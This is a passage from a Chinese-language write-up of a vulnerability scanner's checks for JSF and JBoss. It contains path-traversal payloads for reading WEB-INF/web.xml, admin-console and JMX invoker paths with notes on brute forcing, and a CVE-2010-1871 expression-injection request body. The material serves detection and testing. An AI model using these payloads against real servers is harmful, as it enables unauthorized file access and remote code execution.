        jsfTraversal.add("javax.faces.resource.../WEB-INF/web.xml.xhtml");
        jsfTraversal.add("javax.faces.resource./WEB-INF/web.xml.jsf?ln=..");
        jsfTraversal.add("javax.faces.resource/…\\\\WEB-INF/web.xml"); 
        jsfTraversal.add("jenia4faces/template/../WEB-INF/web.xml/ ");
        
        jsfTraversal.add("/faces/javax.faces.resource/web.xml?ln=..\\\\WEB-INF");
        jsfTraversal.add("/faces/javax.faces.r`eso`urce/..\\\\WEB-INF/web.xml");
        jsfTraversal.add("/faces/javax.faces.resource/web.xml?loc=../WEB-INF");

1
2
3
4
5
6
7
8
9
10
11
 
match到下面就证明能读取到。
 
    static {
        DETECTION_REGEX.add(Pattern.compile("javax.faces.", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
    }

1
2
3
4
 
【29】JBossAdminConsole
 
先fuzz目录
 
 private static final List<String> JBOSS_ADMIN_PATHS = Arrays.asList(
            "/admin-console/login.seam;jsessionid=4416F53DDE1DBC8081CDBDCDD1666FB0"
    );
1
2
3
 
match返回包
 
    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "".getBytes(),
            "".getBytes(),
            "".getBytes()
    );
1
2
3
4
5
6
 
则认为是控制台泄露
 
然后match是否有登录表单
 
    private static final Pattern VIEWSTATE_PATTERN = Pattern.compile("id=\"javax.faces.ViewState\" value=\"(.*?)\"");

1
2
 
然后就可以进行弱口令爆破了
 
【30】testJBossSEAMAdminCVE20101871
 
如果存在控制台
 则可以接着尝试CVE20101871
 这是一个模板注入
 
payload
 
headers.add("POST " + JBOSS_ADMIN_PATHS.get(0) + " HTTP/1.1");
        headers.add("Host: " + url.getHost() + ":" + url.getPort());
        headers.add("Content-Type: application/x-www-form-urlencoded");
        headers.add("Cookie: JSESSIONID=4416F53DDE1DBC8081CDBDCDD1666FB0");

        String body = "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}";

1
2
3
4
5
6
7
 
比较老的漏洞seam组件中插入#{payload}进行模板注入，
 
match的是反射获取的类。这里可以改成更无害一点的payload，例如随机数相加。
 
java
    private static final byte[] GREP_STRING_CVE20101871 = "public+static+java.lang.Runtime+java.lang.Runtime.getRuntime".getBytes();
1
2
 
【31】JBossjBPMAdminConsole
 
JBoss jBPM Admin Console
 
请求path
 
    private static final List<String> JBOSS_jBPM_PATHS = Arrays.asList(
            "/jbpm-console/app/tasks.jsf"
    );
1
2
3
 
match
 
    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "".getBytes()
    );
1
2
3
 
 
【32】 JBossJMXInvoker RCE
 
漏洞path
 
    private static final List<String> JBOSS_INVOKER_PATHS = Arrays.asList(
            "/invoker/EJBInvokerServlet",
            "/invoker/JMXInvokerServlet"
    );   
1
2
3
4
 
match
 
    private static final byte[] GREP_STRING = "org.jboss.invocation.MarshalledValue".getBytes();

1
2
 
是个反序列化，判定的是能不能下载
 
 
【33】JBossJMXReadOnly - RCE
 
路径
 
private static final List<String> JBOSS_INVOKER_PATHS = Arrays.asList(
            "/invoker/readonly"
    );
1
2
3
 
匹配
 
    private static final byte[] GREP_STRING = "org.jboss.invocation.http.servlet.ReadOnlyAccessFilter".getBytes();

1
2
 
这是个命令执行
 
 
【34】JBossJuddi
 
路径
 
private static final List<String> JBOSS_WS = Arrays.asList(
            "/juddi/"
    );
1
2
3
 
match
 
 private static final byte[] GREP_STRING = ">JBoss JUDDI".getBytes();
1
 
只能说明 JBoss Juddi console 控制台泄露，不能证明有漏洞
 
【35】JBossWebConsole
 
路径
 
 private static final List<String> JBOSS_ADMIN_PATHS = Arrays.asList(
            "/web-console/",
            "/jmx-console/"
    );
1
2
3
4
 
match
 
    private static final byte[] GREP_STRING_JMX = "HtmlAdaptor?action=displayMBeans".getBytes();
    private static final byte[] GREP_STRING_WEB = "ServerInfo.jsp\"".getBytes();
1
2
 
一个是web路径 一个jmx路径
 这种如果管理员没有配置账号密码，则存在未授权，因为是管理WEB的，所以直接RCE。
 
 
【36】JBossWS
 
路径
 
private static final List<String> JBOSS_WS = Arrays.asList(
            "/jbossws/services"
    );
1
2
3
 
match
 
    private static final Pattern JBOSSWS_RE = Pattern.compile("JBossWS/Services